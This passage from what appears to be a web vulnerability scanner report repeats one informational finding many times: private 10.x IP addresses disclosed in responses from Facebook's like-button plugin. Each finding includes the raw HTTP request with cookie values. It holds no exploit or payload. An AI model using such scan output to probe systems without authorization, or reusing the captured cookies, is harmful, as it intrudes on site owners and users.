GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df302381a14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.726. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.188.40

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df159578974%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Ffacebook.com%2FWSJ&layout=button_count&locale=en_US&node_type=link&ref=WSJ_homepage&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.727. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.126.58

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa8396448%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.728. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.235.50

Request

Response

19.729. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.242.30

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1636510b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.730. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.188.40

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29b2230e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.731. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.6.43

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df125679654%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.732. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.166.31

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df388f60e9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.733. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.134.127

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df75bab87c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.734. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.134.32

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13c827958%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.735. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.89.42

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32d1e3268%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23649a554%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.736. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.134.65

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df315994844%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.737. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.90.42

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ec8d2c74%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.738. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.223.49

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2431cd37c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.739. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.111.36

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bdf93afc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23649a554%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.740. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.169.43

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b9d98ad%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.741. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.58.43

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31761806%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.742. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.164.46

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25baafde4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.743. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.52.38

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27c25c64%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.744. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.192.122

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d27b033%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.745. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.169.32

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3cbc50a64%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
